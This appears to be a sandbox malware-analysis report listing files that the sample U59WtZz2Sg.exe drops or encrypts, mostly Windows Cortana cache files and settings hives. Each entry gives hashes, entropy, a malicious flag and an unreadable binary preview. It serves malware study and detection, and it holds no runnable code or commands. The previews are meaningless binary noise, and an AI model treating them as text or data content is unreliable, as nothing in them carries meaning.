Preview:	Ej..D.f...7.K0...1..#?......Ioq5..mSE..V.....k..V=....Q.Srg.Zc......H.x'.qlO.R./K...J.........`........... ...:.G..,.O.Rj%....U0...AjY...k.@...>..`...4.#I...-..oJ..6..N.........j.(y...%W...."e.E.<0...l....c.p9.5.pC...4...x....uD..5...VLK..{Q....\..r..9..s'...p...!5...m...[..U....Y6...^V.j...........&T.D&.X....1...'....}...K.....8...y7....+.H...T...V...k.b.^b.>z<G.X.1...n.....8\|...Y.../...(...h(f....^.....@5>Mo.".s..gl/W.+.+g.A\|...f@[..$#s..d..4..{..U.b+a.d..[&.Ap$3u..[..}.....WHE.m.g.&.+.K.../3X.....7.?.e...:M....l...H.e.........2h...?..np...h.d..Jz......g..Q..0O`......G..t.V...,...z...$.$..k....J..S..A.X.+...jR..Z...........t.f...!..I.........T.N.+...T.......+.S.......H.o....r.m...?....S..Y.<]':b...X\1....OO."....z.._*2...\|..B...@.....o>...@rY..mJ.6.7A.3..5..koF...c.5.....>_k.#O).....)..3.lT...d......Jd}...Q{....T.........o~..-.6..@./....@.&.'.%h.#.C..S.K.O.Z?d...M..G...T#d....3.......gcyd2..>....cX..z....0.g...GA..Y.&@.U.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7b0be05b-dd29-4634-bd2c-c09b9631250d}\0.0.filtertrie.intermediate.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	111679
Entropy (8bit):	7.998237631996757
Encrypted:	true
SSDEEP:	1536:rpAusR/cMdbegX6k1oXwCxfvl35sH0bYeYPCL+71f/P8ErKF9bRHpUhAMBObofze:13sB5oACll3k0bOPld8EQVAvdfzpgaS
MD5:	0FCFF814A9B1B86C8AE33BFB3562C8F0
SHA1:	2146B2BA7F3A1DB9E5C3BADE5C210989827BB496
SHA-256:	557E3C116957C48966B6ED1FF359F3FC4411424510842D38DCF60288F13FC087
SHA-512:	5D15EEB133A05E6A965B0CB79FFCB2628D8F3F857B844095409540553B098276E15B70706C424F5D3B7DF7C619918A0FB1C2D0DA440200A0BE7DBD3E32CFE9A9
Malicious:	true
Reputation:	unknown
Preview:	0.0........O.K-9...!..8Jp....g....5~_.<<9.8..-lp..A......./..q<EO...H.V.!.#OP!=<..]X..>.+y.F%P.k.+.......r.s..a..5.!Q.J...F............S.'..E/.4.h7.18.yn)..zS..KdK....2.\|.......=..`j@....^.....Z..;.4.=v:.RP......DZ.q.w....)..>........ye.?.0.....--a......%...]uf...w.2TI.g.....FT...1B/.}^..G.t2o.O)..m%/t.Ir.k..M.....6..z....l.>]....P...@dO.....KX.J9.y..[n7.r.j...?K.Ow....dA..S>.........<Sm..i..<tT....tT.c..T..ay..t..(.R:..X/.....5.......a.ne1Z...dR..`...X./"..&.H....d.;....n/..yd.v..K.Z..Y`n.u.L.MFp.>.+..N.[..8S.q.:.dp..'..... 5$....r.e:.+pQc.\|l.l..+...nc0....y....C....{.Q...p...o.3b_{..UAt.].I..8z1JX.l..(.'.).....a..r.u#)&..mCP8JLh^X38G_uH,w.ha...Z....C...,...#.t..9.O6.:.......;......{3...gkPT..<...M.~O......CCMWdl.}F.L.&$q...9..<..O.>.&.../../..iC..'"..p....IZ...5A..EH.[..$~...<...a.\-..}.W(...Dj.Wp^...........vr...}.U...A..O/_.....4.........u..`.2..q4..l.....&.[...* N3..3K.}.I....':...~...o.....W$M.Y............amT.aR...Z~..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7b0be05b-dd29-4634-bd2c-c09b9631250d}\Settings.ft

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131698
Entropy (8bit):	7.998563259805887
Encrypted:	true
SSDEEP:	3072:ctz5k6J5EMf63iL8MNPpQWKvFIP0Fmxo0QUQzPGxT:2pOi5KtbOwzPGxT
MD5:	FED94E86534E25B08136CA3BE55DC650
SHA1:	C8D96B64C58F7F88E8F9AEB75430CBF91CD2538F
SHA-256:	B0A5496E00245AEC36FADAA429C523545710BC1C802FE38AA0DED74A6C4B804A
SHA-512:	C6BF83C93C95161DCC482D6311682E209BD5C7D29CB4320B6C008B66E1C4EDDE7D7CB08722031EE6D889B7A100999BB4974ED4565E8863FF64776D34EEB77CED
Malicious:	true
Reputation:	unknown
Preview:	......9...X...B.).u... .Y.9. .K..=}..DU..w.C.G.....#G.t.7$..88.=.0L...2H"N.5S'..].....D..X..&.@.....DJ...Z..m.lg.~..h........~;.]...-1G.}..%.v..S.iG.y.hs...F.eu?..?.....1.;y..Q.:z~4......2mN.3<.........'.....!.....{U...M.~KA..4z9....3...(>.... .d.I.nG,'P9Q.G.i.e....Z.....:[...eNx..:.O..P..T...G.&.o....).{.K;g.'..W.\|`..+..K........v.....]...xX].3...rT8.v.?\.>.o...o=..~.........6=........R...\w.x..9./o;r...J.<...Y.'.fn..H.S.sP....W.....Y....V.W......&...+A.h(......C"..".H.H?e...+..;M....)b.N......b.le..E.}...........x..T....".1fQx.1._..V..le..k.Z.....Y..I...+/-...y3...8b..%.G.-?\|..^...y..._.]f..N...qFR,...I....<1W.F@o..yK.{.........#......Y...@"<.f.Omz&.S.z...........8v....Q.".<L..s.....k020<..... ......\|JE.....;Q B.....j=V.......c.q.x\|..>I.....)....ox.q.I.Fu<.?.A....EJq..o.....7.....1*.....9\2......".0"Bb.........+9.......Q.H.?6.GC..D..y\|.k6....]..At.'.=.../...w..$}. #..}....2e....d..</..o..#.#,.......K\E.<.\...Y.......JX.p]..........

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7b0be05b-dd29-4634-bd2c-c09b9631250d}\Settings.index

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	640139
Entropy (8bit):	6.407768827454267
Encrypted:	false
SSDEEP:	12288:jk4hqZtCHAhgkpEiAWyG1SlB0ugsFXElYvWKU9Reat2Efw:jRYeOJhyG1STwRlrKU9Rey2Efw
MD5:	F54539340B4B1C1AC150CC117C270ED6
SHA1:	3C880CBD1EF42A1F8D1E82432F922C2DD3EFB527
SHA-256:	52800C76E8DF7875F857D03901FD8DB7F8FEB2AD9B27ABB3AA2697E86FE09CAD
SHA-512:	A727B3A460A68F633DFBA807980E8EC69169C01C41D6DFC5C85C77B1795D7D82C6C2BE30C9240855C856F5802F610154C6C6A8D5AE313F42EDD4FE605A8EB464
Malicious:	false
Reputation:	unknown
Preview:	Ej..D:...#;@O.N..N>.w.2..J...1.[.u.6..iFO[a4R.\ZP..Q..i.H....V?.\.?.P.%.\G.\ .E.u..(.Pp..g...5...r1.yq.,x..x.p...eC...+<....e}Q(v.k....J..^..h......ij....('..I..<.........k...\....l....$..k.nn .R.s.I.w-...q>..fx6....i;."..n5...d.7...p..o.][.%....]=..U.Ao..%..u.....C.4+d....._.I.!'.M..,..r..Em.]7.l..5.\!.w!.7v.j.h...N..f.S.G..[Z?.......B.`._...h..]Xb...#......_..,....Wn.M87.R.G.u.Z..\ .)[..L..\|....@./sK..q....Z.A...'??.uN.......V...E..&..E..G..a.u...RS....s^.u=.B.9S"......mh429M.(..9V).5r...US....Oq-i....B...k......Z....S..M..A.........l.3..K8S#] U..1.4..woE...X?..66^...v..[........h..Q(sd.bD..T..w.2]@..s.....G.{..G.K.@2. .^..2.FhC.T^...V.\|..Z......<..g.?7^K..4..u.....zI(O....<?..7..k.d.-....wb..,.)...f.f.:.9S...\|`.c...... ...\7.F.......LM.....\....vl.......[n......!.).mj...w.*b@..:.SyFoiJE....0.P.....#o.]9..qgD>..dSvq..f...64.n....!)_.........VH..X-e."..F?;...d.........i......>...i..0'Ti..B.v.jL)...#.N.N...)...Wa....y..[....}.Su........G

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051620838562510.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	115740
Entropy (8bit):	7.99842047333381
Encrypted:	true
SSDEEP:	3072:L2/JkAkDeZDDpyVcc3PlNrhi+Q+9DpuuE:L2RpDYcc3vQ+s
MD5:	BDA9D3248C777A4BC7E15EFAD399053A
SHA1:	CED5D8EB7C4788F9F027276E7A191EE15F84EA18
SHA-256:	F9D21ED2B064D3AFDBF4F27C37940269DDD336FC90F54E165A306841E147AC34
SHA-512:	27C145E27044E6AEE67E8AA45AAEAF921709371308F9E83D16E03141D8017248E00B5DF194EF18590BA486DD639197E3637D98A06DAA9B7EEA2E7DE28472357A
Malicious:	true
Reputation:	unknown
Preview:	[{"Sy">.4a..KIC...............2#....:^......q.....9v.......0p.(..E...Kd.ER......H.d....30.S...wX...r.QwS...)..).........w.'.C....k(.R.c.....!2V4e.h`......!X..D.....60yn~.g...a...Ju)3'..p...%`..j. 1_.~...^.E....D..^+.[Oi.....D.... .`fm.34\|...l..+..{.$.....7....03...F......DZ..F....`,..y.......OwAF_v..;...7.uVgntR....g..._w.N>_...u...G........K..!. ........h{.l.g..y......k7.L....pG.,..$O.....J....yK.%H..QZ.....#..I.Z.eb.B9.....}..4~.0.z}'3&........@..R\R.\|../v..R.h..n.`r....m"].4.FB.q@.?.3....a..-.'.u..P9D...a..{W.BN..?...0.....L..Iw}..>.Q..1!Yaxn.l.m...M.E...x.3.R....1.{$h<....K.....E6`y.R..lTHJX....[.....Ny.....u.%T@c.z.....-..=.....\|...\_7..../.2W.6..A9.r.%.....I.a/S+...).?.......[....UG#..6....q.=...2_..i`j"Y%.P.v1./....na.z.Nf.lO...b..>^..B.....J1.Lf.i.If..(..G7x...m.BQB$#.N...ru~.f....,..c1.a...........a..f.+..........J.".\o7<......6..!w@.^. ..\|$9.Q...N...T5....otb....s..c..__....>d.._."....\|L...0Tm)..F."........:'X....E...4.....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051620921860467.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	115740
Entropy (8bit):	7.998329267901886
Encrypted:	true
SSDEEP:	3072:ItP/Yl8ridxdYcMQoCIFFWMaw1lI7iZn3Hst:9arDXnYMaIa7iZnA
MD5:	555F5C5B11B51978C306F2E64DA6FEA6
SHA1:	EF0317428D5C5EC045E562519D330BC29E21195E
SHA-256:	A2659BC51D1AB46E09916C3E5879FED70267F44E9DE0312D33CB175614DFE906
SHA-512:	EE8FB60897440478526E424A803C856101B1DDEA80A2F51698EB89F88EC11A64A74E24F8702349AD712C1A9D1A2C4F812EBE62EDC9E84AF3509A45F5751CD690
Malicious:	true
Reputation:	unknown
Preview:	[{"SyU-w...Q.k`..g......znm.}..%..m.iE^.)._.X.^($..WdT.B.{C.g.S..s..\.........C9T"..O...D...?`.t....e..\[f..5.....~v>......EG.;.M...=.K.......6.1@`....?.y.......uU. i]...".A..1%l.)...9.3..e.:T\|.}G....m..,..".=.yP..+..1."......SG..k.7l#.5..V.....6.e#Ik........xG...\.s2k.8^.Mc....J...h\_....h.\........e.g...].^.......wj.#...0A...%..-.H.@..\|ar.F......).i..w...ws..GJ......9..SIN...t.3,......kF...pq$9..u.....I..Z$.j.......U....X.....hS.....n....)'...F.9..b.9.-u"\..>.$.9.!..+_"7..E&...a..G.\|.\.e%.GG......c..\.....}..w.....A....0RX......m!p.............6...+..ne...o`..!&.g. bT1C(....&.9..F..'NC....1.....4G(\|.G.M`x..5..yY2-_%az..=f..............#0E.HA.........!...l...r.\|..n..>sR}t...EE...A.8$g.h.up.3E.,.h2`...e.J....f]~....3...].........<..Z.]....B.y... ..O...\|j.:y.!!..-.._.&..^.x..8v..R...X7R..cW?....B_K5d$.....W.{...n#.....e.h..D5n.m.m.....gi..........P.x1..T\=..W..Z..vy..(l.....[.-...LTy...n@6jt.C.S8P......n..+8..&.Un..n.h:.<p^<....x..D..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701119838854.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	114322
Entropy (8bit):	7.998182984828116
Encrypted:	true
SSDEEP:	3072:bAIbZK3IwWV64aTF6JaGGfcGoGsKqganUnDd:bnZOIwv8m+vgaUDd
MD5:	F443D648DE918EC17077CDECA28AFBC4
SHA1:	F2BE75BA93CF2DDCDCCC2A346CC2A433EF00DA6E
SHA-256:	197BBCFF7A5946497E437C2895D0C6412236AA302179D3FD15A99DD583889932
SHA-512:	49C5C1A50DB3C2FCDAD744915BFB43DEF94E3658DBE092263B4AE394E8D7C2DF3B138D3A4ECC25101F34B0DD5B605856F42A8E3755C9AC20A5DAADF21E20E3F7
Malicious:	true
Reputation:	unknown
Preview:	[{"Sy4....\|..(F..f.S........?<.s..`..k...~..x.[...5..$^.....RE.O..VT.1...8,p.i.t......K1..~.TZ..<3...&.y.-KWr...J.\4G..\|O..-.5u..6.H..W...,..3.......{....<0.._.~j.......Vu(.n.$....0....r..u....+v~A.....>..'.Hh.y?..u......m+.(...-.5..`.h. ....mq....!..Oj..X......c.Kq{,.../.t..[.....:....X..d....}.M....f.....5@4.....M.B1...5;O..~&.........).D...{..+..Y.S.....S.../..............!....h4=.>..8........l.k..i.L...A..^...I!L......o..,..8.}..._E0......Y..^..d..$..-W......k.IE1.Y..V@..Z..M..t.....T...MG......._...m.0..?.......Qk)u9).Ub...0q.......u....I.S.;...M.xL........'H5.."r.D..6j[.... ...s+g.........L.e......L."..........S..E4.."?......#.k>.cY..<....2...h.........7.V........BX..8..6"...X..\....F/{CUFL.{...\^O.....plJ...gR..}Et..[.@..........VQ..K.tnh._D..]5UWL..WT..N.U.n..2...%..k....1Z{Y:}...z...G."}....._"......V...A<O.j....R..}....`.5....p.\....).eG..{.u.<.d!.......#..t...+..1.O..`.s:.,*..YN.V0ss2........k..d.g.\|e.....iu`B..l....o....S.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701138403912.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	114322
Entropy (8bit):	7.998229421888122
Encrypted:	true
SSDEEP:	3072:oPQK1UPZTh5WjHVwyFBtIP/urlEugXP3PZOFkLSDIicPZ:oIKuPZrWzFw/urC3PMGLJpPZ
MD5:	17E1514B74587C5CD7679FB2D70DB65C
SHA1:	06C2470CC8E018D0E049AEE64E8FEE6F44274790
SHA-256:	9124637D48F0C05BA2542D0221B368E33B8F2D6335F44BD3FFF41405A854C0C6
SHA-512:	4C2121563343BC30E1BFABD54C378E16C48D4EF798FE2EA260739FC54E436902EC72C1CEF374FD2DFC4DBE1820A99FDFC302112B479E3483458BEE5CD4902313
Malicious:	true
Reputation:	unknown
Preview:	[{"Sy^`>..10.X.xNfR.w..;6...Vx.Sj./+..iD.ie......c...9.$.\...0...7...X.........yd....ME.......Z25b...4...C,...W-.+Gw....Z.p...Q..DL..5p.D.t.>4.R...z.].w..s..y.#.M.}....9.b.+......Z..rHKXP;.!....v^Q.%?4..U...../.^.u..[.....3..oA.j....}........O....(........5.G...v.8-].AN.-........-..........s.i<......@..u.kR....Q....`l.o??.I......_ULF9.[.K..n..l..l....Sg..R........F..4..?..~-.........i.p{..".o..O9.....S..--.N.E..../....Hz\|..........GDZX..Rs.,'..#...ul.<.w.a)S)sE~+.....`...E.[KAn@.-:..D..y>....d..c...n..qJ..K.f...4..B.<....9G4.......\.\|.k..@v..._H.......5.@.......\|...Lp\|.!..O....D....x_...H......Yo.~.j.U..B.7..#cH..z..[.{.....ga...aY.....N1..W.......9^Y.Q.b...c.k....K...M...JC..X.n&"l.*\|G4Sd...a$.......%.......Zo{Q.JN......R..F...b......7.O..V.I..UF..QTt..=.r.5.^.7o.....c.\N.......[.....REM.r.[.....B..q.t......b.........Ob..Z.H..E...&x..L.".y.AWb@T....TS..\|?...z.DC.y..P.i..._8.Q4.......#.Qo.:.b.D6,2..K..m.H..U..n.gB.!..<...h....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133142701505080737.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	114322
Entropy (8bit):	7.998434834805647
Encrypted:	true
SSDEEP:	3072:af5zD1KEaZB2uJzrVyPxsQsUg20KxKKWYbah25BoldMKImhDZF:af5zD1L82uJ/Cxs1v8WOyjMKI2tF
MD5:	53A4DDB878C834C0D3BDE745DEF4E2E4
SHA1:	E448B15C41E6B757D605D3ACD253BBFBCBC0BDF6
SHA-256:	500F92B96187D7874F58C32B5159D310AF5527403FBD8B1BF5B692ADFD7259E5
SHA-512:	E3864AFBBFBE26F896E3682670495FE511C2C560ABC9BD7E3887A24F7C7FB9C091BCBD81C823C52DCAB6DF40E2537EDB12223ABDAE3C5BB7F5AEDC424E98C137
Malicious:	true
Reputation:	unknown
Preview:	[{"Sy.....J..4..4.B...\|...g....NU+E..}.&..d...H.Z."3.aJ.Y%.......b..v...e...1..#!.......@........M..<.j.`.....'.d.y3..o$._.N.O.j.M.R.w.~gbK...Vv...P.4O..@ED..n..B.../.l.{....b......).F.4.iF.....q.I.4....Mr.FL...N._.f./.K..c....o.q.<.^P.t.t.w..w%^..._........EB..P.)....!.....C...V..V~.&..A.8...UZbk.;.7.j...}1.m.9...N..\.k.'.d..fP.G.1`...}..u..J......)X.).(&o~P...a.k...\,..C...ee.y....8`...^.b....!.3..Zhy......d.2W..J..E..zov...1....j+.+.]..%.m0..b.g..[....7(dT'.\|%..!.S........P.V.3...s.P...m.........K#..W ....v..y.Q2d..... Vm..r...o.#..2Np.r&.I.4.Ro.M.tC....L..dh.fF.e.......t.R5..+i.....v"V.$k......<..&.J...JB..1.....o....5_::.]pN.F%v.Y....0/.....K......5.I5..Qk.......A.2,./...B.~...#.,.rF.uC..F...7....72rAM./!Y.#^..yDr2j.Wq.U.Q.....d.v-..b.\fn]....yU.....k:..6..r...$h0..f8.Z<n....u,..l.\|.A.De..'.e6NQ...]..]o.'].>(4.6.^F1.1j9.'n..E..g3...uq..`.....s.u....`..*V.......6.R...g......T.J}.H9.[.@V.2(.Yp<....5.\..k.n...u.b.B..6^..%M....yn.=

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	413392
Entropy (8bit):	6.7805369750709374
Encrypted:	false
SSDEEP:	12288:y0sL6r9j19OCTrLDUgfA/aYKIx1p9RKJJ:ymFj9TrsgfA/aYKIx1p9RKJJ
MD5:	20997939062435C73911A00F1EF608A2
SHA1:	F7E4E09804C15D35CDE12F06FBB7BA1FD0CACCBA
SHA-256:	868ED666499C30F7660AFBB0D9CB5A58F1B7CF641DD6F5C7182A41AFFA13A04E
SHA-512:	B342C399C77C80B57A4B9881B49DB937B72CB2A3729E415510790FBC671FA22B071CC07417D568370B87A74C2089255CCD820DB3B0F5227DA6CE3379C0ED00F6
Malicious:	true
Reputation:	unknown
Preview:	[{"Sy..gZ......1.#......`.g.dt...p>3<s.g.lD3..f.......R@.N....~.......[i.........-.]....-.........~wS..6}=.~..;./...0...6.nu....x......2...+..Qx.x.>,...B.v....^5!....3.......c..8<..AL.G.......i.1z.........>:.x..(....p...6./.S.G.."...\..}n..t.u.15.N.`M.?..D.u...&j...m...'eBFO....#un3Q.[.0CsH..YAm.....f.e.. .8.8...10.[.U\:.A@..k._...g.<_.B.G.W...!I.F..15A.C....lZn........U.B..c.......Nk...<.X...Z...s.[...~Ur..Zw.W..i.\|V..~{.u.,.....FAD...PA....24-.....H._.b;..UN.f..N..^..&..K.p.B.G.?.. O.K.Y[8..........V..v.sz.C.YN..r.%B..U[..!...OI.u_ .5.?..W`2...O.H C.p.cMz_?.t.k...b.T8!..Y.~..k....'..g.](8.{..q....,.V)....\|.....53>....\Q..e..v.b)a.1...&.J.-.^Q{..E.......I6.U.A...z..0....I...e.H...x..7..n....'.7..+.'.P.........%.1.!..8.N.Y...+$.h.Z\|e....9.l..2.......U.4>..t..1..&R".A.@.lwVO..B.3.4..)?..W.T.R..Q.....)..L.~K..M..(......2.-!..f.j.@G.G i..o.s.8/.0T.ms.V.....u.a..D2h...Y].6..Re_.......r6.'j..^..R"O...D...l..8..A{....Q..%u.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	69689
Entropy (8bit):	7.997797454963391
Encrypted:	true
SSDEEP:	1536:zu3zkvgzEkva+vvm2h6psRgSVbUccG11xGwSGmQkzieJUPA6m:YzmmFyqm2h6psRgMUXGlLSGXkzX1
MD5:	66AC2493FFEB39BD31C42993A92185F3
SHA1:	3FA80D3942FEEAF5354DD567D45A87D684A2C68B
SHA-256:	795D64071556C82A56C9744D9205BE47DA9573E718AFDC22FFCE7B9F33C41869
SHA-512:	2859513D566BF677154832720BC470A8C811F10131B1A1F096157CA662840AD0A69007B61E2FE173340B38F1578BF2BF359ACB51AD6B15D0530CCFA58B6FE066
Malicious:	true
Reputation:	unknown
Preview:	...w.28-.+.f.p...5..9......0......@.:...Gr.i...h^Z..80.A...^..gj.M..H'>.e@..d,..a\.m..=q#.....:..k...1.....r.....^..s..c.Y;...<K....MX....66...}.G.)!#=.^.m..o.h.Gi....:P;......Fr)..\|..#.k..\|p.sS'..,....,ng.3{....h......._.<.l...q...T.....'....z.U..[.v,#x2.J ..../........E.dK.....(....//.9....,....Q..A.A..t._.V..zNY.L...`.ts..O.Q.......C...pP.YU.TtF.L..V.z.y..n.O."....k.i:+.......`2.`z.[...6..`...b!ur..[....ogi&%-.....3UU...W..v4^7..6.....\x.X..LG}R.U..y.o3..B.\.M7..D...C.R1B.=.K.:b.B..`.2.(../...B..Q}..}..."k...x....s.1.......0...2S..<..!+.WP.W.O7{Jx.p.=...N....b.}-!.;f%...w..wA.......V.........~.}........U.1.n........)/5.j..%.........p...O.....g.g;.sf..`...R...(>...Wk.c.../...A^.C.,.4KG3^..a=<!..t3.....?..i..6.(.%Ww.b:s.o.:V.DCV.-.9].h@y._."...o...#.k>qi$...$......2m.+9.$=%>Q.>,Me.!..O...K...t.po..h.............g.x.3........%.3.4.w.TVx.h(C...\....-.T...yT.r.,m.=S._....7..L.\|].....l......{.t....mU.8".+..5.h..&....+..S..%s.....xM.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977020670381337
Encrypted:	false
SSDEEP:	192:gx1DzC/YetEBg3pOj817y2Qlh3qyK8O3ePxPm7:gxuttEaOj817xw3v6oxw
MD5:	A48054BBE26E4F428EF93F8FD3552D75
SHA1:	448125918D8828A7F2170954490E45C6CCE29C1D
SHA-256:	A43E983BD1F56123BEDE44C2D8C2174BD516531622A6B35DA8B510D260CF849E
SHA-512:	BBD73A2F2F6618233B0948972A4F5BAA71FF4D79E64240A4CFB758CC712068549F46177DD0978F54BF0B062CC4295C5CB47FBC2AAC207A12C86FFB543CCA71CA
Malicious:	false
Reputation:	unknown
Preview:	regf....oBF.........ZJq6/.... qO.6.+.%..C@...'H."oL..:H.M......../.7M...S$,D.&.....]...x..i...F....&.U.;.K..OZ.Vf....y.oz....s..jtK....y,...oZa.~C&Y...e.B7..#Z5{{o.\j..cw.d.,.~9.h.l..U..W..m.r.G..\V.I^...`.e.u.H....tT...F...\....%....,B]i..n699...v/{.$...tD8......+......p.OxdR^.?..K.u...$.5.j..\.G.?V.....m.'@">.....L.4.k..oqn..$...@.5:I....N...p.^....YS...]..a7.xIx^.V..p.E....x@.....3.f]..K&G]....;0..JU...a.....7....D....}...._. ..r'.......2...@.gL.,u.`..K....t.\|jC.X{.Q.G.4.U..0\..:t5..XK).f ....s...`V......w._".:.X...4.._....D.....Tz.b..x...i.v.'_y{lT..\yCX2!.a......T...n...j.Pm..V..4...F.(..'.../PQ.U..Q.zh..Q.[..8..E.3K...FC.....\..1..3Z....X...m...,..!..\H..0.cMj.4+..H...?..=.q.(.=........g.....$.o^.....`./.\.E..?..[f.....Y2.p.v&.t....f........#......H..:W^`\|.C.d...n.`ddW..}.5H..d.Y..9....y...];x....$].2>......Z.S\|.;k..:.T..Z./....i.. .e.....?.F.n!$....Y..B.P.@..Q...d..B.;..v..QX.@.........!6=......%..'..,. ...........\.v.B..?)m.;+.U.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978975166006346
Encrypted:	false
SSDEEP:	192:NRhG4Cv3GQUot2BfVM6ZdYvW2hTxo72DD8t6HDIcTy:NnGtvrrt+fW6ZaVo7t0HDIcTy
MD5:	8A13BC50C0A6BD70E240C4255A9E9197
SHA1:	9A84019AD3BF398A910DD1F287BC96A39A891FBC
SHA-256:	2288E9D0CFED40B9FB2FC3915F4BBAE198D219A685FA6B099981A0C41C30E1BD
SHA-512:	8A8D705B56FCB0AA321F206D4952CD136379FDFE8FE93BCBF56F661A3F7643AF3B92B691B850F1536BDED44401D923ACC059C100AFE1ADDA80F192882D73861A
Malicious:	false
Reputation:	unknown
Preview:	regf.+xA.Y5.:.\....d.}7.....]^r.x......8D.."...:~.<L.=...'..[.bp\B.v....Ut.=..-0....B.-..V..;._.bg#.....V. .$.6]?:p..\T?.(G...@n........;_M..~[.FzDZ.J.kI..2?...aQ.h.H....Z\|.k.%...^..NT....6.z....l..T..].X.}.K....(IG.'3...5.6.1#...!x..y...$..t....^]V.j.q..$'....a.Y..#...mlW'...Eo.=..u{....5'.%...2......`vrx.',..P...W..'.i.7....{....../........S.)..(a...@...v.H......~c.Q......KZK..~......D].=.-..H..k{..T.7.F.....'...[."a].....N..<.Q.H?T.....2V...L...?w..Z..].../....%.X\t4B..s;U(8^..]...P.A...TJ.m.kB.X.G...}m_..`.W7IT.8.w.....D"eu.....)'......o....1....b...-...X;..._]`..D......XP ...7.cJ.....TEj.P\.T..G...O........G.E.p..<Gx.u..NA.......Htt.<...z....7gY..^.w........r.M...L....".O..~..........[...v.Kj.r...>..d.k..........P......@..q...H.w..;.{.%..3...j....4.2@...GS....{.%..>.vQW.q(...&x..A.".#.`.c..M[.OU%..M....'.E......2j.\...Bt......Q.X...t...&._..J......)K.Xu..n...u...+....Dr..#Rj..^.Yy.I..Z....'s.G..>N8~.J..)....}MT"....+....p.q).E.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980648632040737
Encrypted:	false
SSDEEP:	192:oF+aXcPVwpgaas6fOjBneWaA198ZODdG2f76f6ebvA:F6cPVwpgA62jBeQ8ZOjWbvA
MD5:	3F5E5A00806A10F8A1F2D46429DE99A0
SHA1:	B53D41B2AB3E40D7ED5D689EDE7F5906AE3CF2E5
SHA-256:	24A4B95EE8FDFCDCAFCBE90954722FEE2261C6543C64D8C212976071978CE736
SHA-512:	D744E78AB5D844533016044FFDAFB87757515181AE382BDD39DA30A1BEF1FD1C20EA9D219F3ABAD7FD765431714E7D0CE4B630F44AB0F849D03499E7926380CF
Malicious:	false
Reputation:	unknown
Preview:	regf..9]Y.m..T...y...B;@......R.4.e.<...2Z....N.I..$..#.......k...f.P..3+..q.D.^..C....',s-.....hB.@.'..k.g=".\..8.2.Nw....lX...bqu...(..Xw...'..D{.rS..L..........P..Tw...............V..x._kaC......h.....4mz6...Nd.K..y.1.y.].}....R.').......b...}8R_@....z.>..o..r.E.6.'..:.8..c.S@O.....O.d..._.;..L...7.p...u..H.#.Z.....M.Ol..Q.....0......l.6.u`..u.k...xT..'.gH_HW..?.HF...>....X....<[..4..!'.......yE/;>%....u....VLl;..5W)K.6.Ep.s.@b.....g..Pa......9Ivq.V.Z..o..>i...r... .,.7..;..#.j...Z.F....$..\|KX...~.....%.}...9l...?83.....l)K.".J..(..b9cVu.\|W..u_..&..O..>.A?..<....n.+.DDk6\.F.....kv\....j ...K).;.3U...S..c{...$.`..?.2L.k/.._.3fG.....M....}..ug......c.XJ.(}U.i.....K......$5......aq.x..M.^... ..E./..;...O....&k>i.`Kv....2......{.l.^.4.2..\|..h.pDp.&f.".tO..D`..u..c.5..c.!.....;C.]M...\|...P.._>...-..83...............i.T....hbhF,..O.Qi..e.6.$.j).4... ..[.$....w..m,..S..9..p.......w..65....U....QzO5...).lVM....}=.`3.,.nL...Y..%x..\..

